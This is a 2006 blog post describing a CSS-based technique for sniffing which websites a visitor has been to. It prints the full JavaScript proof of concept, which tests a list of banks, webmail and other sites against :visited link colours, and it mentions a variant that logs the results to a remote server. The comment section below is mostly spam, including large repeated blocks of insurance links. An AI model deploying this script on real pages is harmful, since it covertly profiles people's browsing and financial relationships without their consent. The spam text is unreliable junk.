Stealing History

Update: Cody Swan has a version that works in IE and supports AJAX to log the urls somewhere. Info here. 

 Jeremiah Grossman has demonstrated an interesting way to sniff out browser history via CSS hacks. IE7 RC1 is smart enough to block the site, but FireFox lists my history without any complaints. Spooky. The script it embedded on the page, and it appears that basic technique involves setting the visited link color via CSS on a group of links to common sites, and then getting the computed values of the links and seeing which ones have the visited color. Very clever way to hijack someone's history:

<script>
var agent = navigator.userAgent.toLowerCase();
var is_mozilla = (agent.indexOf("mozilla") != -1);

// popular websites. Lookup if user has visited any.
var websites = [
	"http://login.yahoo.com/",
	"http://www.jailbabes.com",
	"http://ha.ckers.org",
	"http://seoblackhat.com",
	"http://www.cgisecurity.com",
	"http://www.spidynamics.com",
	"http://www.cenzic.com",
	"http://www.watchfire.com",
	"http://www.ntobjectives.com",
	"http://www.webappsec.org",
	"http://www.whitehatsec.com",
	"http://english.aljazeera.net/HomePage",
	"http://mail.google.com/",
	"http://mail.yahoo.com/",
	"http://my.yahoo.com/",
	"http://slashdot.org/",
	"http://www.myspace.com/",
	"http://www.amazon.com/",
	"http://www.aol.com/",
	"http://www.bankofamerica.com/",
	"http://www.bankone.com/",
	"http://www.blackhat.com/",
	"http://www.blogger.com/",
	"http://www.bofa.com/",
	"http://www.capitalone.com/",
	"http://www.chase.com/",
	"http://www.citibank.com/",
	"http://www.cnn.com/",
	"http://www.comerica.com/",
	"http://www.e-gold.com/",
	"http://www.ebay.com/",
	"http://www.etrade.com/",
	"http://www.google.com/",
	"http://www.hsbc.com/",
	"http://www.icq.com/",
	"http://www.microsoft.com/",
	"http://www.msn.com/",
	"http://www.myspace.com/",
	"http://www.passport.net/",
	"http://www.paypal.com/",
	"http://www.sourceforge.net/",
	"http://www.statefarm.com/",
	"http://www.usbank.com/",
	"http://www.wachovia.com/",
	"http://www.wamu.com/",
	"http://www.wellsfargo.com/",
	"http://www.xanga.com/",
	"http://www.yahoo.com/",
	"https://commerce.blackhat.com/",
	"https:/banking.wellsfargo.com/",
];

/* prevent multiple XSS loads */
if (! document.getElementById('xss_flag')) {
	
	var d = document.createElement('div');
	d.id = 'xss_flag';
	document.body.appendChild(d);

	var d = document.createElement('table');
	d.border = 0;
	d.cellpadding = 5;
	d.cellspacing = 10;
	d.width = '90%';
	d.align = 'center';
	d.id = 'data';
	document.body.appendChild(d);
	
	document.write('<style>');
	for (var i = 0; i < websites.length; i++) {
		document.write('#id' + i + ":visited {color: #0000FF;}");
	}
	document.write('</style>');

	/* launch steal history */

if (is_mozilla) {
stealHistory();	
}
	
}


/*--- [method: stealHistory] -------------------------------------------#
# Description: Send a browsers history to an off-domain URL.			#
-----------------------------------------------------------------------*/
function stealHistory() {
	
	// loop through websites and check which ones have been visited
	for (var i = 0; i < websites.length; i++) {
	
		var link = document.createElement("a");
		link.id = "id" + i;
		link.href = websites[i];
		link.innerHTML = websites[i];
		
		document.body.appendChild(link);
		var color = document.defaultView.getComputedStyle(link,null).getPropertyValue("color");
		document.body.removeChild(link);

		// check for visited
		if (color == "rgb(0, 0, 255)") {
			document.write('<li><a href="' + websites[i] + '">' + websites[i] + '</a></li>');
		} // end visited check
		
	} // end visited website loop
	
} // end stealHistory method

</script>

[1] http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html

Published Friday, August 25, 2006 12:15 AM by Jesse Ezell
Filed under: , , , ,

Comments

# Interesting Finds: August 24, 2006

Thursday, August 24, 2006 10:35 PM by Jason Haley

# http://digg.com/security/a_css_hack_to_steal_your_browser_history_in_firefox

Friday, August 25, 2006 5:34 PM by TrackBack

# Stealing History (Part 2)

Saturday, August 26, 2006 3:36 PM by Jesse Ezell Blog

Cody Swann has a modified version of the exploit using prototype that works in IE and has support for

# re: Stealing History

Tuesday, October 03, 2006 8:22 PM by WebMaster ToolBox

Cool, but totally useless no?

Unless you want to check if a certain person visited your website or not...

# re: Stealing History

Wednesday, May 16, 2007 4:35 AM by i.write.code

Not really, Its good for Blackhat SEO folks. Besides , think of what benefits Google gets out of monitoring your search preferences through their Toolbar and in gmail.

ADs pay and relevant ADs pay even more ...

# re: Stealing History

Sunday, June 03, 2007 2:37 AM by HI! Nice design! <a href= http://www.insurance.yourallinsurance.com/renters-insurance.html >Renters insurance</a> <a href= http://www.insurance.yourallinsurance.com/life-insurance.html >Life insurance</a> <a href= http://www.insurance.yourallinsurance.com/travel-insurance.html >Travel insurance</a> <a href= http://www.insurance.yourallinsurance.com/usaa-insurance.html >USAA insurance</a> <a href= http://www.insurance.yourallinsurance.com/auto-insurance.html >Auto insurance</a> <a href= http://www.insurance.yourallinsurance.com/home-insurance.html >Home insurance</a> <a href= http://www.insurance.yourallinsurance.com/insurance.html >Insurance</a> <a href= http://www.insurance.yourallinsurance.com/medical-insurance.html >Medical insurance</a> <a href= http://www.insurance.yourallinsurance.com/cheap-auto-insurance.html >Cheap auto insurance</a> <a href= http://www.insurance.yourallinsurance.com/american-family-insurance.html >American family insurance</a> <a href= http://www.insurance.yourallinsurance.com/dental-insurance.html >Dental insurance</a> <a href= http://www.insurance.yourallinsurance.com/automobile-insurance.html >Automobile insurance</a> <a href= http://www.insurance.yourallinsurance.com/affordable-health-insurance.html >Affordable health insurance</a> <a href= http://www.insurance.yourallinsurance.com/business-insurance.html >Business insurance</a> <a href= http://www.insurance.yourallinsurance.com/cheap-car-insurance.html >Cheap car insurance</a> <a href= http://www.insurance.yourallinsurance.com/individual-health-insurance.html >Individual health insurance</a> <a href= http://www.insurance.yourallinsurance.com/homeowners-insurance.html >Homeowners insurance</a> <a href= http://www.insurance.yourallinsurance.com/insurance-companies.html >Insurance companies</a> <a href= http://www.insurance.yourallinsurance.com/whole-life-insurance.html >Whole life insurance</a> <a href= http://www.insurance.yourallinsurance.com/geico-insurance.html >Geico insurance</a> <a href= http://www.insurance.yourallinsurance.com/term-life-insurance.html >Term life insurance</a> <a href= http://www.insurance.yourallinsurance.com/allstate-insurance.html >Allstate insurance</a> <a href= http://www.insurance.yourallinsurance.com/mortgage-insurance.html >Mortgage insurance</a> <a href= http://www.insurance.yourallinsurance.com/long-term-care-insurance.html >Long term care insurance</a> <a href= http://www.insurance.yourallinsurance.com/auto-insurance-usaa.html >Auto insurance USAA</a> <a href= http://www.insurance.yourallinsurance.com/auto-insurance-quotes.html >Auto insurance quotes</a> <a href= http://www.insurance.yourallinsurance.com/health-insurance-quotes.html >Health insurance quotes</a> <a href= http://www.insurance.yourallinsurance.com/motorcycle-insurance.html >Motorcycle insurance</a> <a href= http://www.insurance.yourallinsurance.com/home-owners-insurance.html >Home owners insurance</a> <a href= http://www.insurance.yourallinsurance.com/boat-insurance.html >Boat insurance</a> ,Insurance u

HI! Nice design!

<a href= www.insurance.yourallinsurance.com/renters-insurance.html >Renters insurance</a>  <a href= www.insurance.yourallinsurance.com/life-insurance.html >Life insurance</a>  <a href= www.insurance.yourallinsurance.com/travel-insurance.html >Travel insurance</a>  <a href= www.insurance.yourallinsurance.com/usaa-insurance.html >USAA insurance</a>  <a href= www.insurance.yourallinsurance.com/auto-insurance.html >Auto insurance</a>  <a href= www.insurance.yourallinsurance.com/home-insurance.html >Home insurance</a>  <a href= www.insurance.yourallinsurance.com/insurance.html >Insurance</a>  <a href= www.insurance.yourallinsurance.com/medical-insurance.html >Medical insurance</a>  <a href= www.insurance.yourallinsurance.com/cheap-auto-insurance.html >Cheap auto insurance</a>  <a href= www.insurance.yourallinsurance.com/american-family-insurance.html >American family insurance</a>  <a href= www.insurance.yourallinsurance.com/dental-insurance.html >Dental insurance</a>  <a href= www.insurance.yourallinsurance.com/automobile-insurance.html >Automobile insurance</a>  <a href= www.insurance.yourallinsurance.com/affordable-health-insurance.html >Affordable health insurance</a>  <a href= www.insurance.yourallinsurance.com/business-insurance.html >Business insurance</a>  <a href= www.insurance.yourallinsurance.com/cheap-car-insurance.html >Cheap car insurance</a>  <a href= www.insurance.yourallinsurance.com/individual-health-insurance.html >Individual health insurance</a>  <a href= www.insurance.yourallinsurance.com/homeowners-insurance.html >Homeowners insurance</a>  <a href= www.insurance.yourallinsurance.com/insurance-companies.html >Insurance companies</a>  <a href= www.insurance.yourallinsurance.com/whole-life-insurance.html >Whole life insurance</a>  <a href= www.insurance.yourallinsurance.com/geico-insurance.html >Geico insurance</a>  <a href= www.insurance.yourallinsurance.com/term-life-insurance.html >Term life insurance</a>  <a href= www.insurance.yourallinsurance.com/allstate-insurance.html >Allstate insurance</a>  <a href= www.insurance.yourallinsurance.com/mortgage-insurance.html >Mortgage insurance</a>  <a href= www.insurance.yourallinsurance.com/long-term-care-insurance.html >Long term care insurance</a>  <a href= www.insurance.yourallinsurance.com/auto-insurance-usaa.html >Auto insurance USAA</a>  <a href= www.insurance.yourallinsurance.com/auto-insurance-quotes.html >Auto insurance quotes</a>  <a href= www.insurance.yourallinsurance.com/health-insurance-quotes.html >Health insurance quotes</a>  <a href= www.insurance.yourallinsurance.com/motorcycle-insurance.html >Motorcycle insurance</a>  <a href= www.insurance.yourallinsurance.com/home-owners-insurance.html >Home owners insurance</a>  <a href= www.insurance.yourallinsurance.com/boat-insurance.html >Boat insurance</a>  ,HI! Nice design!

<a href= www.insurance.yourallinsurance.com/renters-insurance.html >Renters insurance</a>  <a href= www.insurance.yourallinsurance.com/life-insurance.html >Life insurance</a>  <a href= www.insurance.yourallinsurance.com/travel-insurance.html >Travel insurance</a>  <a href= www.insurance.yourallinsurance.com/usaa-insurance.html >USAA insurance</a>  <a href= www.insurance.yourallinsurance.com/auto-insurance.html >Auto insurance</a>  <a href= www.insurance.yourallinsurance.com/home-insurance.html >Home insurance</a>  <a href= www.insurance.yourallinsurance.com/insurance.html >Insurance</a>  <a href= www.insurance.yourallinsurance.com/medical-insurance.html >Medical insurance</a>  <a href= www.insurance.yourallinsurance.com/cheap-auto-insurance.html >Cheap auto insurance</a>  <a href= www.insurance.yourallinsurance.com/american-family-insurance.html >American family insurance</a>  <a href= www.insurance.yourallinsurance.com/dental-insurance.html >Dental insurance</a>  <a href= www.insurance.yourallinsurance.com/automobile-insurance.html >Automobile insurance</a>  <a href= www.insurance.yourallinsurance.com/affordable-health-insurance.html >Affordable health insurance</a>  <a href= www.insurance.yourallinsurance.com/business-insurance.html >Business insurance</a>  <a href= www.insurance.yourallinsurance.com/cheap-car-insurance.html >Cheap car insurance</a>  <a href= www.insurance.yourallinsurance.com/individual-health-insurance.html >Individual health insurance</a>  <a href= www.insurance.yourallinsurance.com/homeowners-insurance.html >Homeowners insurance</a>  <a href= www.insurance.yourallinsurance.com/insurance-companies.html >Insurance companies</a>  <a href= www.insurance.yourallinsurance.com/whole-life-insurance.html >Whole life insurance</a>  <a href= www.insurance.yourallinsurance.com/geico-insurance.html >Geico insurance</a>  <a href= www.insurance.yourallinsurance.com/term-life-insurance.html >Term life insurance</a>  <a href= www.insurance.yourallinsurance.com/allstate-insurance.html >Allstate insurance</a>  <a href= www.insurance.yourallinsurance.com/mortgage-insurance.html >Mortgage insurance</a>  <a href= www.insurance.yourallinsurance.com/long-term-care-insurance.html >Long term care insurance</a>  <a href= www.insurance.yourallinsurance.com/auto-insurance-usaa.html >Auto insurance USAA</a>  <a href= www.insurance.yourallinsurance.com/auto-insurance-quotes.html >Auto insurance quotes</a>  <a href= www.insurance.yourallinsurance.com/health-insurance-quotes.html >Health insurance quotes</a>  <a href= www.insurance.yourallinsurance.com/motorcycle-insurance.html >Motorcycle insurance</a>  <a href= www.insurance.yourallinsurance.com/home-owners-insurance.html >Home owners insurance</a>  <a href= www.insurance.yourallinsurance.com/boat-insurance.html >Boat insurance</a>  

# Ledokin &raquo; A CSS Hack to steal your browser history in Firefox

Saturday, November 10, 2007 11:50 AM by Ledokin » A CSS Hack to steal your browser history in Firefox

Pingback from  Ledokin    &raquo; A CSS Hack to steal your browser history in Firefox

# jeremiah s complaints

Thursday, June 12, 2008 1:31 PM by jeremiah s complaints

Pingback from  jeremiah s complaints

# Ab workout machine

Wednesday, July 09, 2008 9:23 AM by Ab workout machine

Thanks for the post. I couldnt agree with you more.

# hacking &raquo; Blog Archive &raquo; A CSS Hack to steal your browser history in Firefox

Monday, September 01, 2008 2:40 PM by hacking » Blog Archive » A CSS Hack to steal your browser history in Firefox

Pingback from  hacking  &raquo; Blog Archive   &raquo; A CSS Hack to steal your browser history in Firefox

Leave a Comment

(required) 
(required) 
(optional)
(required)